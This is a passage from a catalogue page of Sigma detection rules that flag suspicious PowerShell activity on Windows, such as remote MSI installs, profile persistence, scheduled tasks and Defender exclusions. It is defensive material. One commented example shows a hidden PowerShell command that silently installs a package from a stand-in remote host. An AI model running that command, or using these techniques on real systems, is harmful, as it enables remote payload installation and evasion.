Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
references:
- https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
- https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
author: Meroujan Antonyan (vx3r)
date: 2025-06-05
tags:
- attack.execution
- attack.stealth
- attack.t1059.001
- attack.t1218
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
# Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u),'')";
selection_img:
- Image|endswith:
- '\powershell_ise.exe'
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell_ISE.EXE'
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli:
CommandLine|contains|all:
- '-ComObject'
- 'InstallProduct('
selection_remote:
CommandLine|contains:
- 'http'
- '\\\\'
filter_main_localhost:
CommandLine|contains:
- '://127.0.0.1'
- '://localhost'
condition: all of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
PowerShell Module File Created By Non-PowerShell Process
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
view Sigma YAML
title: PowerShell Module File Created By Non-PowerShell Process
id: e3845023-ca9a-4024-b2b2-5422156d5527
status: test
description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
references:
- Internal Research
- https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-09
modified: 2025-10-07
tags:
- attack.persistence
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains:
- '\WindowsPowerShell\Modules\'
- '\PowerShell\7\Modules\'
filter_main_pwsh:
Image|endswith:
- ':\Program Files\PowerShell\7-preview\pwsh.exe'
- ':\Program Files\PowerShell\7\pwsh.exe'
- ':\Windows\System32\poqexec.exe' # https://github.com/SigmaHQ/sigma/issues/4448
- ':\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe'
- ':\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
- ':\Windows\SysWOW64\poqexec.exe' # https://github.com/SigmaHQ/sigma/issues/4448
- ':\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe'
- ':\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
filter_main_msiexec:
Image:
- 'C:\Windows\System32\msiexec.exe'
- 'C:\Windows\SysWOW64\msiexec.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell Profile Modification
Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
view Sigma YAML
title: PowerShell Profile Modification
id: b5b78988-486d-4a80-b991-930eff3ff8bf
status: test
description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
references:
- https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
- https://persistence-info.github.io/Data/powershellprofile.html
author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
date: 2019-10-24
modified: 2023-10-23
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1546.013
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith:
- '\Microsoft.PowerShell_profile.ps1'
- '\PowerShell\profile.ps1'
- '\Program Files\PowerShell\7-preview\profile.ps1'
- '\Program Files\PowerShell\7\profile.ps1'
- '\Windows\System32\WindowsPowerShell\v1.0\profile.ps1'
- '\WindowsPowerShell\profile.ps1'
condition: selection
falsepositives:
- System administrator creating Powershell profile manually
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell Remote Session Creation
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
view Sigma YAML
title: PowerShell Remote Session Creation
id: a0edd39f-a0c6-4c17-8141-261f958e8d8f
status: test
description: |
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4
author: frack113
date: 2022-01-06
modified: 2023-01-02
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'New-PSSession'
- '-ComputerName '
condition: selection
falsepositives:
- Legitimate administrative script
level: medium
Convert to SIEM query
medium
Strong
Medium FP
PowerShell Script Run in AppData
Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
view Sigma YAML
title: PowerShell Script Run in AppData
id: ac175779-025a-4f12-98b0-acdaeb77ea85
status: test
description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
references:
- https://twitter.com/JohnLaTwC/status/1082851155481288706
- https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
date: 2019-01-09
modified: 2022-07-14
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection1:
CommandLine|contains:
- 'powershell.exe'
- '\powershell'
- '\pwsh'
- 'pwsh.exe'
selection2:
CommandLine|contains|all:
- '/c '
- '\AppData\'
CommandLine|contains:
- 'Local\'
- 'Roaming\'
condition: all of selection*
falsepositives:
- Administrative scripts
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell Script With File Hostname Resolving Capabilities
Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.
view Sigma YAML
title: PowerShell Script With File Hostname Resolving Capabilities
id: fbc5e92f-3044-4e73-a5c6-1c4359b539de
status: test
description: Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.
references:
- https://www.fortypoundhead.com/showcontent.asp?artid=24022
- https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-05
tags:
- attack.exfiltration
- attack.t1020
logsource:
product: windows
category: ps_script
definition: bade5735-5ab0-4aa7-a642-a11be0e40872
detection:
selection:
ScriptBlockText|contains|all:
- 'Get-content '
- 'foreach'
- '[System.Net.Dns]::GetHostEntry'
- 'Out-File'
condition: selection
falsepositives:
- The same functionality can be implemented by admin scripts, correlate with name and creator
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell WMI Win32_Product Install MSI
Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class
view Sigma YAML
title: PowerShell WMI Win32_Product Install MSI
id: 91109523-17f0-4248-a800-f81d9e7c081d
status: test
description: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
author: frack113
date: 2022-04-24
tags:
- attack.stealth
- attack.t1218.007
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Invoke-CimMethod '
- '-ClassName '
- 'Win32_Product '
- '-MethodName '
- '.msi'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell Write-EventLog Usage
Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use
view Sigma YAML
title: PowerShell Write-EventLog Usage
id: 35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e
status: test
description: Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use
references:
- https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-16
tags:
- attack.defense-impairment
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Write-EventLog'
- '-RawData '
condition: selection
falsepositives:
- Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Powershell Create Scheduled Task
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
view Sigma YAML
title: Powershell Create Scheduled Task
id: 363eccc0-279a-4ccf-a3ab-24c2e63b11fb
status: test
description: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task
author: frack113
date: 2021-12-28
modified: 2025-10-07
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_cmdlet:
ScriptBlockText|contains:
- 'New-ScheduledTaskAction'
- 'New-ScheduledTaskTrigger'
- 'New-ScheduledTaskPrincipal'
- 'New-ScheduledTaskSettingsSet'
- 'New-ScheduledTask'
- 'Register-ScheduledTask'
selection_cimmethod:
ScriptBlockText|contains|all:
- 'Invoke-CimMethod'
- '-ClassName'
- 'PS_ScheduledTask'
- '-NameSpace'
- 'Root\Microsoft\Windows\TaskScheduler'
filter_main_legitimate_scripts:
ScriptBlockText|contains|all:
- 'Microsoft.PowerShell.Core\Export-ModuleMember'
- 'Microsoft.Management.Infrastructure.CimInstance'
- '__cmdletization_methodParameter'
condition: 1 of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
High FP
Powershell Defender Exclusion
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
view Sigma YAML
title: Powershell Defender Exclusion
id: 17769c90-230e-488b-a463-e05c08e9d48f
related:
- id: c1344fa2-323b-4d2e-9176-84b4d4821c88
type: similar
status: test
description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
references:
- https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
- https://twitter.com/AdamTheAnalyst/status/1483497517119590403
author: Florian Roth (Nextron Systems)
date: 2021-04-29
modified: 2022-05-12
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection1:
CommandLine|contains:
- 'Add-MpPreference '
- 'Set-MpPreference '
selection2:
CommandLine|contains:
- ' -ExclusionPath '
- ' -ExclusionExtension '
- ' -ExclusionProcess '
- ' -ExclusionIpAddress '
condition: all of selection*
falsepositives:
- Possible Admin Activity
- Other Cmdlets that may use the same parameters
level: medium
Convert to SIEM query
medium
Moderate
High FP
Powershell Detect Virtualization Environment
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.
This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
view Sigma YAML
title: Powershell Detect Virtualization Environment
id: d93129cd-1ee0-479f-bc03-ca6f129882e3
status: test
description: |
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.
This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md
- https://techgenix.com/malicious-powershell-scripts-evade-detection/
author: frack113, Duc.Le-GTSC
date: 2021-08-03
modified: 2022-03-03
tags:
- attack.discovery
- attack.stealth
- attack.t1497.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_action:
ScriptBlockText|contains:
- Get-WmiObject
- gwmi
selection_module:
ScriptBlockText|contains:
- MSAcpi_ThermalZoneTemperature
- Win32_ComputerSystem
condition: all of selection*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Powershell Directory Enumeration
Detects technique used by MAZE ransomware to enumerate directories using Powershell
view Sigma YAML
title: Powershell Directory Enumeration
id: 162e69a7-7981-4344-84a9-0f1c9a217a52
status: test
description: Detects technique used by MAZE ransomware to enumerate directories using Powershell
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
- https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
author: frack113
date: 2022-03-17
tags:
- attack.discovery
- attack.t1083
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- foreach
- Get-ChildItem
- '-Path '
- '-ErrorAction '
- SilentlyContinue
- 'Out-File '
- '-append'
condition: selection
falsepositives:
- Legitimate PowerShell scripts
level: medium
Convert to SIEM query
medium
Moderate
High FP
Powershell Execute Batch Script
Adversaries may abuse the Windows command shell for execution.
The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.
The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.
Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system
view Sigma YAML
title: Powershell Execute Batch Script
id: b5522a23-82da-44e5-9c8b-e10ed8955f88
status: test
description: |
Adversaries may abuse the Windows command shell for execution.
The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.
The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.
Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script
author: frack113
date: 2022-01-02
tags:
- attack.execution
- attack.t1059.003
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_start:
ScriptBlockText|contains: Start-Process
selection_batch:
ScriptBlockText|contains:
- '.cmd'
- '.bat'
condition: all of selection_*
falsepositives:
- Legitimate administration script
level: medium
Convert to SIEM query
Showing 901-950 of 1,440